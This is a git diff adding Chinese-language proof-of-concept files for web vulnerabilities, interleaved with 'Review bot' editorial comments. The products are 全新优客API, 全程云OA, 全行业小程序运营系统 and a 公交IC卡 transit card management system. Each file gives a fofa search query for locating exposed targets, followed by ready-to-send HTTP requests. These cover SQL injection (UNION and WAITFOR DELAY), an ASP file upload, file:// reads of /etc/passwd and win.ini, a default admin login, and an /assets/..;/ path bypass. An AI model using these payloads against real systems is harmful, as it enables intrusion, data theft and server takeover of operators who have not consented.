a/全新优客API接口管理系统doc存在SQL注入漏洞.md b/全新优客API接口管理系统doc存在SQL注入漏洞.md new file mode 100644 index 0000000..92155fb --- /dev/null +++ b/全新优客API接口管理系统doc存在SQL注入漏洞.md 
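Review bot: the recorded 上传文件位置 /UploadFile/202401/2024011004110066.aspx in 先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md is a single timestamped instance; say that the name is generated server-side from the upload time, otherwise it reads as a fixed path. The second form field value "Submin" is probably "Submit", and the 影响版本 entry carries no version.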
@@ -0,0 +1,26 @@ +# 全新优客API接口管理系统doc存在SQL注入漏洞 + +全新优客API接口管理系统 index/doc 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="public/static/index/css/flaghome.css" +``` + +## poc + +```javascript +POST /index/index/doc HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@VERSION,NULL-- - +``` + +![image-20241114142149139](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141421210.png) \ No newline at end of file diff --git a/全程云OA接口UploadFile存在任意文件上传漏洞.md b/全程云OA接口UploadFile存在任意文件上传漏洞.md new file mode 100644 index 0000000..3ed3a19 --- /dev/null +++ b/全程云OA接口UploadFile存在任意文件上传漏洞.md 
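Review bot: the impact statement in 全新优客API接口管理系统doc存在SQL注入漏洞.md (管理员后台密码 ... 写入木马 ... 获取服务器系统权限) goes well beyond what the reproduction shows, which is a database version banner in the response; keep the impact line to what is demonstrated or cite the source that established the rest. The fofa query is fenced as ```javascript and no affected version is given.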
@@ -0,0 +1,37 @@ +# 全程云OA接口UploadFile存在任意文件上传漏洞 + +全程云OA接口UploadFile存在任意文件上传漏洞。该漏洞允许攻击者上传webshell木马获取服务器权限。 + +## fofa + +```java +body="images/yipeoplehover.png" +``` + +## poc + +```java +POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR +Content-Length: 191 + +------WebKitFormBoundaryNe8DcVuv1vEUWDaR +Content-Disposition: form-data; name="upload";filename="123.Asp" + +<% response.write("hello,world") %> +------WebKitFormBoundaryNe8DcVuv1vEUWDaR-- +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/T4kFVsKphUd6OYRYMyMUtg \ No newline at end of file diff --git a/全程云OA系统QCPES.asmx存在SQL注入漏洞.md b/全程云OA系统QCPES.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..9c19b5d --- /dev/null +++ b/全程云OA系统QCPES.asmx存在SQL注入漏洞.md 
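Review bot: the non-standard header Accept-Ldwk: bG91ZG9uZ3dlbmt1 in 全程云OA接口UploadFile存在任意文件上传漏洞.md is a base64 watermark carried over from the source post, not part of the request, and Content-Length: 191 does not match the multipart body; strip the header. The 漏洞来源 link is good, but the file should also record the affected version and whether a fix exists.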
@@ -0,0 +1,49 @@ +# 全程云OA系统QCPES.asmx存在SQL注入漏洞 + +全程云OA QCPES.asmx 接口多个实例处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="images/yipeoplehover.png" +``` + +## poc + +```javascript +POST /OA/PES/QCPES.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetCode" + +<?xml version="1.0" encoding="utf-8"?> +<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> + <soap:Body> + <GetCode xmlns="http://tempuri.org/"> + <fk_parid>1' UNION ALL SELECT @@VERSION-- oCWH</fk_parid> + <value>1</value> + </GetCode> + </soap:Body> +</soap:Envelope> +``` + +```javascript +POST /OA/PES/QCPES.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetValue" + +<?xml version="1.0" encoding="utf-8"?> +<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> + <soap:Body> + <GetValue xmlns="http://tempuri.org/"> + <fk_parid>1</fk_parid> + <code>1' UNION ALL SELECT @@VERSION-- oCWH</code> + </GetValue> + </soap:Body> +</soap:Envelope> +``` + +![image-20241106224830320](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062248382.png) \ No newline at end of file diff --git a/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md b/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md new file mode 100644 index 0000000..626f2f3 --- /dev/null +++ b/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md 
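Review bot: "Content-Length: length" in both requests of 全程云OA系统QCPES.asmx存在SQL注入漏洞.md is the literal placeholder from the auto-generated .asmx service description page; mark it as such so readers do not treat it as a captured request. The description says 多个实例 but only GetCode and GetValue are shown; list the affected SOAP methods explicitly, since a defender filtering on SOAPAction needs the full set.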
@@ -0,0 +1,34 @@ +# 全行业小程序运营系统接口_requestPost存在任意文件读取漏洞 + +# 一、漏洞简介 +全行业小程序运营系统是一个无需编程,各行业模版直接套用,一键生成,轻松搭建小程序,界面自由DIY,同步实时预览,可视化操作让您所见即所得,随心打造个性小程序。全行业小程序运营系统接口_requestPost存在任意文件读取漏洞 + +# 二、影响版本 +全行业小程序运营系统 + +# 三、资产测绘 +```plain +"/com/css/head_foot.css" +``` + +![1721066404678-898e96b4-2cea-4e70-9dac-653d60e96720.png](./img/bH9l78edGUcZCbQD/1721066404678-898e96b4-2cea-4e70-9dac-653d60e96720-692946.png) + +# 四、漏洞复现 +```plain +GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +``` + +![1721067419506-8c5e67ed-72de-4ba9-86f6-3fd3fd3f9a0d.png](./img/bH9l78edGUcZCbQD/1721067419506-8c5e67ed-72de-4ba9-86f6-3fd3fd3f9a0d-553972.png) + +```plain +/api/wxapps/_requestPost?url=file:///C:/windows/win.ini&data=1 +``` + +![1721067536077-3ea5d227-9a72-4564-b33c-443cef0742f5.png](./img/bH9l78edGUcZCbQD/1721067536077-3ea5d227-9a72-4564-b33c-443cef0742f5-856042.png) + + + +> 更新: 2024-08-12 17:16:00 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xhsw1s8g1fmxb8nf> \ No newline at end of file diff --git a/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md b/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md new file mode 100644 index 0000000..1bbe113 --- /dev/null +++ b/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md 
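Review bot: the 资产测绘 block in 全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md is a bare string "/com/css/head_foot.css" with no engine or field name, unlike the fofa:/app= form used elsewhere. The title says 任意文件读取, but the parameter is url= taking a file:// scheme, i.e. an unrestricted URL fetch; say so, because the remediation is a scheme allowlist on that fetch, not a path check.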
@@ -0,0 +1,42 @@ +# 公交IC卡收单管理系统bus存在SQL注入漏洞 + +公交IC卡收单管理系统bus存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + +获取cookie + +```javascript +POST /login HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +username=admin&password=e10adc3949ba59abbe56e057f20f883e +``` + +```jade +POST /bus HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + diff --git a/公交IC卡收单管理系统bus存在SQL注入漏洞.md b/公交IC卡收单管理系统bus存在SQL注入漏洞.md new file mode 100644 index 0000000..5f2e63f --- /dev/null +++ b/公交IC卡收单管理系统bus存在SQL注入漏洞.md 
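Review bot: 公交IC卡收单管理系统bus存在SQL注入漏洞 2.md duplicates the bus file added later in this commit, differing only in the path (/bus versus /assets/..;/bus) and a 获取cookie login step; the " 2.md" suffix looks like a file-manager duplicate and the same pairing recurs for line, parametercard, role and user. Merge each pair, label the username, hashed password and JSESSIONID as values captured from the tester's instance rather than part of the PoC, and fix the second fence, which is tagged ```jade.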
@@ -0,0 +1,35 @@ +# 公交IC卡收单管理系统bus存在SQL注入漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统bus存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/giAq65h_S8s7uRND/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-534614.png) + +# 四、漏洞复现 +```java +POST /assets/..;/bus HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + +![1727274271656-6a16a890-34ae-4997-bf7e-9dca4dfa13fe.png](./img/giAq65h_S8s7uRND/1727274271656-6a16a890-34ae-4997-bf7e-9dca4dfa13fe-448402.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rs9z40892wvgac14> \ No newline at end of file diff --git a/公交IC卡收单管理系统line存在SQL注入漏洞 2.md b/公交IC卡收单管理系统line存在SQL注入漏洞 2.md new file mode 100644 index 0000000..991452e --- /dev/null +++ b/公交IC卡收单管理系统line存在SQL注入漏洞 2.md 
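Review bot: the description in 公交IC卡收单管理系统bus存在SQL注入漏洞.md says 经过身份验证的攻击者, yet the request path is /assets/..;/bus, which is the difference from the sibling " 2.md" file that logs in first; the text never explains it. State whether the ..;/ path reaches the handler without a valid session, because that decides the severity and the fix (path normalization in front of the servlet container plus authentication on the handler, not only parameterised queries).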
@@ -0,0 +1,43 @@ +# 公交IC卡收单管理系统line存在SQL注入漏洞 + +公交IC卡收单管理系统line存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + +获取cookie + +```javascript +POST /login HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +username=admin&password=e10adc3949ba59abbe56e057f20f883e +``` + +```javascript +POST /line HTTP/1.1 +Host: +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +X-Requested-With: XMLHttpRequest +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Priority: u=0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + diff --git a/公交IC卡收单管理系统line存在SQL注入漏洞.md b/公交IC卡收单管理系统line存在SQL注入漏洞.md new file mode 100644 index 0000000..c75e6f5 --- /dev/null +++ b/公交IC卡收单管理系统line存在SQL注入漏洞.md 
@@ -0,0 +1,36 @@ +# 公交IC卡收单管理系统line存在SQL注入漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统line存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/27itoy_d4ROVZs5J/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-833989.png) + +# 四、漏洞复现 +```java +POST /assets/..;/line HTTP/1.1 +Host: +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +X-Requested-With: XMLHttpRequest +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Priority: u=0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + +![1727274356642-8fe0f2b0-4e2e-4779-b3c6-a2f3949306fe.png](./img/27itoy_d4ROVZs5J/1727274356642-8fe0f2b0-4e2e-4779-b3c6-a2f3949306fe-268894.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gg6lz5os1welciza> \ No newline at end of file diff --git a/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md b/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md new file mode 100644 index 0000000..8ac4bb9 --- /dev/null +++ b/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md 
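Review bot: the claim 调用xp_cmdshell写入后门文件,执行任意代码 in 公交IC卡收单管理系统line存在SQL注入漏洞.md is not supported by the reproduction, which only shows a WAITFOR DELAY timing check; either limit the impact line to what the screenshot demonstrates or cite where the stronger result was established. The same unsupported sentence is pasted into the bus, parametercard, role and user files.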
@@ -0,0 +1,43 @@ +# 公交IC卡收单管理系统parametercard存在SQL注入漏洞 + +公交IC卡收单管理系统parametercard存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + +获取cookie + +```javascript +POST /login HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +username=admin&password=e10adc3949ba59abbe56e057f20f883e +``` + +```javascript +POST /parametercard HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Priority: u=0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate + +method=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + diff --git a/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md b/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md new file mode 100644 index 0000000..1a296db --- /dev/null +++ b/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md 
@@ -0,0 +1,36 @@ +# 公交IC卡收单管理系统parametercard存在SQL注入漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统parametercard存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/85M-YfRK9InMkZ63/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-203251.png) + +# 四、漏洞复现 +```java +POST /assets/..;/parametercard HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Priority: u=0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate + +method=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'-- +``` + +![1727274434961-80ba992d-1919-49df-a4ce-122d980cfdaa.png](./img/85M-YfRK9InMkZ63/1727274434961-80ba992d-1919-49df-a4ce-122d980cfdaa-709936.png) + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/en6kvkeehgrtgagx> \ No newline at end of file diff --git a/公交IC卡收单管理系统role存在SQL注入漏洞 2.md b/公交IC卡收单管理系统role存在SQL注入漏洞 2.md new file mode 100644 index 0000000..cd3b36c --- /dev/null +++ b/公交IC卡收单管理系统role存在SQL注入漏洞 2.md 
@@ -0,0 +1,42 @@ +# 公交IC卡收单管理系统role存在SQL注入漏洞 + +公交IC卡收单管理系统role存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + +获取cookie + +```javascript +POST /login HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +username=admin&password=e10adc3949ba59abbe56e057f20f883e +``` + +```javascript +POST /role HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'-- +``` + diff --git a/公交IC卡收单管理系统role存在SQL注入漏洞.md b/公交IC卡收单管理系统role存在SQL注入漏洞.md new file mode 100644 index 0000000..d33c7a0 --- /dev/null +++ b/公交IC卡收单管理系统role存在SQL注入漏洞.md 
@@ -0,0 +1,35 @@ +# 公交IC卡收单管理系统role存在SQL注入漏洞 + +# 一、漏洞简介 +公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。公交IC卡收单管理系统 role存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 公交IC卡收单管理系统 + +# 三、资产测绘 ++ fofa`app="公交IC卡收单管理系统"` ++ 特征 + +![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/dyW3C6ThOGt0sRum/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-157372.png) + +# 四、漏洞复现 +```java +POST /assets/..;/role HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'-- +``` + +![1727274105161-0d35d76a-8101-4198-9b0a-9606dbc0777f.png](./img/dyW3C6ThOGt0sRum/1727274105161-0d35d76a-8101-4198-9b0a-9606dbc0777f-800904.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lntxyx716eea8fw2> \ No newline at end of file diff --git a/公交IC卡收单管理系统user存在SQL注入漏洞 2.md b/公交IC卡收单管理系统user存在SQL注入漏洞 2.md new file mode 100644 index 0000000..8860784 --- /dev/null +++ b/公交IC卡收单管理系统user存在SQL注入漏洞 2.md 
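Review bot: stray space in "公交IC卡收单管理系统 role存在SQL注入漏洞" in the description of 公交IC卡收单管理系统role存在SQL注入漏洞.md; otherwise the file is the same template as its siblings, including the uncited xp_cmdshell claim and the missing version.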
@@ -0,0 +1,43 @@ +# 公交IC卡收单管理系统user存在SQL注入漏洞 + +公交IC卡收单管理系统user存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="公交IC卡收单管理系统" +``` + +## poc + +获取cookie + +```javascript +POST /login HTTP/1.1 +Host: +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest + +username=admin&password=e10adc3949ba59abbe56e057f20f883e +``` + +```javascript +POST /user HTTP/1.1 +Host: +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5 +``` + +![image-20240926102454314](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261024373.png) \ No newline at end of file diff --git a/公交IC卡收单管理系统user存在SQL注入漏洞.md b/公交IC卡收单管理系统user存在SQL注入漏洞.md new file mode 100644 index 0000000..711fdf7 --- /dev/null +++ b/公交IC卡收单管理系统user存在SQL注入漏洞.md 
